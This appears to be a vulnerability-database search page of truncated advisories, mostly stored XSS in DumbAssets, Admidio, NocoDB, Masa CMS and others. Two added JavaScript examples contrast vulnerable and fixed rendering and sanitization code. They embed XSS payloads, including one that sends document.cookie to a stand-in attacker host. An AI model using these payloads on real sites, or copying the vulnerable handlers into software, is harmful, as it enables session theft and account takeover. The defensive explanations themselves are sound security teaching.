12 matches found
CVE-2026-45231
DumbAssets 1.0.11 is affected by a stored XSS vulnerability in asset fields (name, description, modelNumber, serialNumber, tags) that are stored without server-side sanitization and rendered via innerHTML without client-side escaping. An attacker can create or update assets through asset API endp...
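Worked example, added here and not DumbAssets code: it reproduces the pattern the entry describes (asset fields concatenated into markup that the client assigns to innerHTML) next to a renderer that encodes each field for the context it lands in. The asset record is constructed; its field names follow the advisory, its values are attacker-supplied payloads.

```javascript
// Added example, not DumbAssets code. The asset record below is constructed;
// its field names follow the advisory (name, description, modelNumber,
// serialNumber, tags), its values are attacker-supplied payloads.
const asset = {
  name: 'Laptop <img src=x onerror="alert(document.cookie)">',
  description: 'Office "loaner" & spare',
  modelNumber: 'XPS-13',
  serialNumber: '"><script>alert(1)</script>',
  tags: ['it', '<svg onload=alert(2)>'],
};

// Vulnerable pattern: raw fields concatenated into markup that the client
// then assigns to element.innerHTML. Every field is an injection point,
// including the attribute value on the outer div.
function renderAssetUnsafe(a) {
  return `<div class="asset" data-serial="${a.serialNumber}">` +
    `<h2>${a.name}</h2><p>${a.description}</p>` +
    `<span class="model">${a.modelNumber}</span>` +
    a.tags.map((t) => `<span class="tag">${t}</span>`).join('') +
    '</div>';
}

// HTML encoding that is safe for element text and for double-quoted
// attribute values (the two contexts used below).
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Same markup, every untrusted value encoded at the point it is emitted.
// In the browser the equivalent without string-building is createElement
// plus el.textContent = value, which can never introduce a tag.
function renderAssetSafe(a) {
  return `<div class="asset" data-serial="${escapeHtml(a.serialNumber)}">` +
    `<h2>${escapeHtml(a.name)}</h2><p>${escapeHtml(a.description)}</p>` +
    `<span class="model">${escapeHtml(a.modelNumber)}</span>` +
    a.tags.map((t) => `<span class="tag">${escapeHtml(t)}</span>`).join('') +
    '</div>';
}

// Checks whether the payload's tags survived as real tags (ones the browser
// would parse) rather than as encoded text. Used only to compare the two
// renderers above.
function containsInjectedTag(html) {
  return /<(script|img|svg)\b/i.test(html);
}

console.log(containsInjectedTag(renderAssetUnsafe(asset))); // true
console.log(containsInjectedTag(renderAssetSafe(asset)));   // false
```

Encoding at render time is the client-side half of the fix; the advisory's other half, server-side validation of what is stored, is independent of it and stops the payload from reaching every other consumer of the API (exports, other clients, e-mail).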
CVE-2026-32757
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecardmessage'] value instead of the HTMLPurifier-sanitized $formValues['ecardmessage'] when constructing the greeting card HTML. This allows an authenticated attacker to inject...
CVE-2026-32757
Admidio eCard HTML email injection vulnerability (CVE-2026-32757) arises from using the raw POST message instead of the HTMLPurifier-sanitized value when constructing the eCard HTML. The sanitize step runs during form validation but the sanitized value is never used; the template then embeds the ...
GHSA-8VM4-G489-V3W7 NocoDB Vulnerable to Stored Cross-Site Scripting via Comments and Rich Text Cells
Summary User-controlled content in comments and rich text cells was rendered via v-html without sanitization, enabling stored XSS. Details Comments in Comments.vue and rich text in TextArea.vue were parsed by markdown-it with html: true and injected via v-html. The codebase had vue-dompurify-html...
GHSA-QXWQ-Q265-HC44 NocoDB Vulnerable to Stored Cross-site Scripting via Rich Text Field
Summary An authenticated user with Editor role can inject arbitrary HTML into Rich Text cells by bypassing the TipTap editor and sending raw HTML via the API. Details The TipTap editor sanitizes HTML client-side, but the backend stores raw HTML without server-side sanitization. The stored content...
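Worked example covering the Admidio entries (sanitized value computed but never used) and both NocoDB entries (editor sanitizes client-side, backend stores raw HTML). It is added here and is not Admidio or NocoDB code (Admidio is PHP, NocoDB is Vue/TypeScript); the handler names, the `store` object and the `body.value` field are assumed. The sanitizer is a toy written inline so the example runs offline; it stands in for HTMLPurifier or DOMPurify and is not a substitute for them.

```javascript
// Added example, not Admidio or NocoDB code. It models the shared defect:
// a sanitizer exists, but the value that is stored or templated is the raw
// request input. Names below (handle*, store, body.value) are assumed.

// Toy allowlist sanitizer for this example only. Production code should use
// a maintained library (DOMPurify, sanitize-html, HTMLPurifier in PHP). It
// shows what "sanitize" has to mean here: unknown tags dropped, attributes
// dropped, links limited to safe schemes.
const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'i', 'em', 'strong', 'ul', 'ol', 'li', 'a']);

function sanitizeHtml(input) {
  const out = [];
  const tokens = /<[^>]*>|[^<]+/g; // a tag-like run "<...>" or text without "<"
  let m;
  while ((m = tokens.exec(String(input))) !== null) {
    const tok = m[0];
    if (tok[0] !== '<') { out.push(tok.replace(/>/g, '&gt;')); continue; }
    const tag = /^<\s*(\/?)\s*([a-zA-Z][a-zA-Z0-9]*)/.exec(tok);
    if (!tag) continue;                         // malformed "<<" or "<1": drop
    const name = tag[2].toLowerCase();
    if (!ALLOWED_TAGS.has(name)) continue;      // <script>, <img>, <svg>, ...: drop
    if (tag[1] === '/') { out.push(`</${name}>`); continue; }
    let attrs = '';                             // all attributes dropped ...
    if (name === 'a') {                         // ... except a vetted href on <a>
      const h = /\shref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(tok);
      const url = h ? (h[1] ?? h[2] ?? h[3] ?? '').trim() : '';
      if (/^(https?:|mailto:)/i.test(url)) attrs = ` href="${url.replace(/"/g, '&quot;')}"`;
    }
    out.push(`<${name}${attrs}>`);
  }
  return out.join('');
}

// The advisories' pattern: validation computes a sanitized copy, but the
// handler writes (or the template embeds) body.value, so the sanitizer is
// dead code.
function handleRichTextUpdateVulnerable(body, store) {
  const formValues = { value: sanitizeHtml(body.value) };
  store.value = body.value;          // raw input persisted; formValues unused
  return store.value;
}

// Fix: sanitize on the server, on the write path, and persist only that
// output. What the client-side editor (TipTap, a form widget) did is
// irrelevant, because an authenticated user can skip it and call the API.
function handleRichTextUpdateFixed(body, store) {
  const formValues = { value: sanitizeHtml(body.value) };
  store.value = formValues.value;
  return store.value;
}

// Constructed request body: what a user posts straight to the API after
// bypassing the editor. Every payload sits in a field the app expects.
const rawBody = {
  value: '<p>Quarterly <b onmouseover="alert(1)">report</b></p>' +
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' +
    '<a href="javascript:alert(2)">link</a><a href="https://example.com">ok</a>',
};

console.log(handleRichTextUpdateVulnerable(rawBody, {})); // stored exactly as sent
console.log(handleRichTextUpdateFixed(rawBody, {}));
// <p>Quarterly <b>report</b></p><a>link</a><a href="https://example.com">ok</a>
```

The review check for this bug class is mechanical: find every call to the sanitizer and confirm its return value is the thing that reaches the database or the template. In the Admidio case the sanitized value lived in `$formValues` while the template read `$_POST`; in the NocoDB case the sanitizer only existed in the browser.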
CVE-2026-1011
A stored cross-site scripting XSS vulnerability exists in the Altium Support Center AddComment endpoint due to missing server-side input sanitization. Although the client interface applies HTML escaping, the backend accepts and stores arbitrary HTML and JavaScript supplied via modified POST...
EUVD-2025-203028
Masa CMS is an open source Enterprise Content Management platform. Versions 7.2.8 and below, 7.3.1 through 7.3.13, 7.4.0-alpha.1 through 7.4.8 and 7.5.0 through 7.5.1 are vulnerable to XSS when an unsanitized value of the ajax URL query parameter is directly included within the section of the HTM...
CVE-2025-66492 Masa CMS vulnerable to Cross-Site Scripting (XSS) through URL Parameter
Masa CMS is an open source Enterprise Content Management platform. Versions 7.2.8 and below, 7.3.1 through 7.3.13, 7.4.0-alpha.1 through 7.4.8 and 7.5.0 through 7.5.1 are vulnerable to XSS when an unsanitized value of the ajax URL query parameter is directly included within the section of the HTM...
PT-2025-50881
Name of the Vulnerable Software and Affected Versions: Masa CMS versions 7.2.8 and below; Masa CMS versions 7.3.1 through 7.3.13; Masa CMS versions 7.4.0-alpha.1 through 7.4.8; Masa CMS versions 7.5.0 through 7.5.1. Description: Masa CMS, an open source Enterprise Content Management platform, is...
Zyxel Nbg6816 and Zyxel Nbg6817 cross-site request forgery vulnerability
The Zyxel Nbg6816 and Zyxel Nbg6817 are both products of the Taiwanese vendor Zyxel Communications. The Zyxel Nbg6816 is a dual-band wireless gigabit router. The Zyxel Nbg6817 is a wireless router. The Zyxel Nbg6816 and Zyxel Nbg6817 suffer from a cross-site request forgery vulnerability that stems from...
CVE-2018-8606
A cross site scripting vulnerability exists when Microsoft Dynamics 365 on-premises version 8 does not properly sanitize a specially crafted web request to an affected Dynamics server, aka "Microsoft Dynamics 365 on-premises version 8 Cross Site Scripting Vulnerability." This affects Microsoft...
Simple Web Server 0.5.1 File Disclosure Vulnerability
No description provided by source. Source: http://www.securityfocus.com/bid/6145/info. Simple Web Server does not properly sanitize web requests. By adding a slash-slash sequence ('//') to a URI, an attacker can disclose files on the vulnerable web server, effectively bypassing any...